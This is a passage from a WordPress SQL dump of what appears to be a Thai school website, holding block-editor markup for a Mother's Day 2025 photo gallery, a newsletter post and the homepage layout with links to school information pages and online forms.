src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_26-1024x576.jpg\" alt=\"\" class=\"wp-image-1966\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1968,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_25-1024x576.jpg\" alt=\"\" class=\"wp-image-1968\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1969,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_23-1024x576.jpg\" alt=\"\" class=\"wp-image-1969\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1970,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_24-1024x576.jpg\" alt=\"\" class=\"wp-image-1970\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1971,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_22-1024x576.jpg\" alt=\"\" class=\"wp-image-1971\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1972,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_21-1024x576.jpg\" alt=\"\" class=\"wp-image-1972\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1973,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_20-1024x576.jpg\" alt=\"\" class=\"wp-image-1973\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1974,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_19-1024x576.jpg\" alt=\"\" class=\"wp-image-1974\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1975,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_18-1024x576.jpg\" alt=\"\" class=\"wp-image-1975\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1976,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_17-1024x576.jpg\" alt=\"\" class=\"wp-image-1976\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1978,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_15-1024x576.jpg\" alt=\"\" class=\"wp-image-1978\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1977,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_16-1024x576.jpg\" alt=\"\" class=\"wp-image-1977\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1979,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_14-1024x576.jpg\" alt=\"\" class=\"wp-image-1979\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1980,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_13-1024x576.jpg\" alt=\"\" class=\"wp-image-1980\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1981,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_12-1024x576.jpg\" alt=\"\" class=\"wp-image-1981\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1984,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_10-1024x576.jpg\" alt=\"\" class=\"wp-image-1984\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1982,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_11-1024x576.jpg\" alt=\"\" class=\"wp-image-1982\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1983,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_9-1024x576.jpg\" alt=\"\" class=\"wp-image-1983\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1986,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_8-1024x576.jpg\" alt=\"\" class=\"wp-image-1986\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1985,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_7-1024x576.jpg\" alt=\"\" class=\"wp-image-1985\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1987,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_6-1024x576.jpg\" alt=\"\" class=\"wp-image-1987\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1989,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_5-1024x576.jpg\" alt=\"\" class=\"wp-image-1989\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1991,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_4-1024x576.jpg\" alt=\"\" class=\"wp-image-1991\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1988,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_3-1024x576.jpg\" alt=\"\" class=\"wp-image-1988\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1992,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_2-1024x576.jpg\" alt=\"\" class=\"wp-image-1992\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1990,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_1-1024x576.jpg\" alt=\"\" class=\"wp-image-1990\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"placeholder\":\"Type / to add a hidden block\"} -->\n<p></p>\n<!-- /wp:paragraph --></details>\n<!-- /wp:details -->','กิจกรรม วันแม่แห่งชาติ ปี 2568','','inherit','closed','closed','','1944-revision-v1','','','2025-08-14 10:25:48','2025-08-14 03:25:48','',1944,'http://pakhaeng.ssk.in.th/?p=1993',0,'revision','',0),
(1995,1,'2025-08-27 14:09:16','2025-08-27 07:09:16','<!-- wp:image {\"id\":1996,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/17-68.png\" alt=\"\" class=\"wp-image-1996\"/></figure>\n<!-- /wp:image -->','วารสาร17/68','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a317-68','','','2025-08-27 14:09:18','2025-08-27 07:09:18','',0,'http://pakhaeng.ssk.in.th/?p=1995',0,'post','',0),
(1996,1,'2025-08-27 14:08:53','2025-08-27 07:08:53','','17-68','','inherit','','closed','','17-68','','','2025-08-27 14:08:53','2025-08-27 07:08:53','',1995,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/17-68.png',0,'attachment','image/png',0),
(1997,1,'2025-08-27 14:09:16','2025-08-27 07:09:16','<!-- wp:image {\"id\":1996,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/17-68.png\" alt=\"\" class=\"wp-image-1996\"/></figure>\n<!-- /wp:image -->','วารสาร17/68','','inherit','closed','closed','','1995-revision-v1','','','2025-08-27 14:09:16','2025-08-27 07:09:16','',1995,'http://pakhaeng.ssk.in.th/?p=1997',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1998,1,'2025-08-27 14:13:29','2025-08-27 07:13:29','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[1904],\"type\":\"grid\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":1904,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=1904\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbyztUtl8EM-IiB9-zUQiX6uZlpuS1009A7GnLyQYTDE88aCpW5lZ-fTDR-YT54UB2_i/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div 